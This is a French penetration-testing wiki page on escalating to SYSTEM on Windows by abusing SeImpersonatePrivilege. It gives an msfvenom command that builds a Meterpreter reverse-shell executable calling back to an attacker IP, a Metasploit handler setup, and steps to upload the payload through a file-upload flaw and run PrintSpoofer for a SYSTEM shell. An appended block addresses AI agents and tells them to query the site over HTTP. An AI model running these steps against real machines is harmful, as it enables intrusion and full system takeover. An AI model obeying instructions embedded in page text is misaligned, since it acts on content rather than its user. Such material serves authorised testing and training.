# SeImpersonatePrivilege

## Exploitation

{% hint style="info" %}
Prérequis: La cible doit être vulnérable à une faille de type file upload pour pouvoir être exploité.
{% endhint %}

Maintenant que nous avons testé que nous pouvions télécharger un shell et exécuter des commandes, il est temps d'exploiter le système et d'obtenir un meterpreter sur la machine cible. Cela signifie que nous devrons créer une charge utile à l'aide de msfvenom ou de tout autre outil de votre choix. Nous nommons notre charge utile shell.exe.

*`$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker IP> lport=<port d'écoutee> -f exe > shell.exe`*

Il nous faut également préparer un multi handler sur notre machine pour recevoir la connexion.

```bash
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT <port d'écoute>
exploit
```

La prochaine étape est d'uploader le reverse shell dans le server cible et de l'exécuter.

Une fois que le shell est bien reçu dans le multi handler, bien que vous n'ayez pas besoin de vous fier à la commande getprivs du shell Metepreter. Vous pouvez vérifier que le privilège activé peut être vérifié à l'aide de la commande whoami avec l'option /priv.

*`meterpreter> whoami /priv`*

On doit donc retrouver dans la réponse

SeImpersonatePrivilege en "Enabled" et le nom de l'utilisateur auquel on est connecté.

## Elevation de privilège

Pour abuser de cette fonctionnalité on peut utiliser l'exécutable PrintSpoofer.exe.

{% embed url="<https://github.com/itm4n/PrintSpoofer>" %}

*`C:\users\public>PrintSpoofer.exe -i -c cmd`*

Si tout se passe bien, cela devrait ouvrir un cmd avec les droits NT AUTHORITY\SYSTEM.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.s1rn3tz.ovh/post-exploitation/enumeration-elevation-de-privileges/windows/seimpersonateprivilege.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.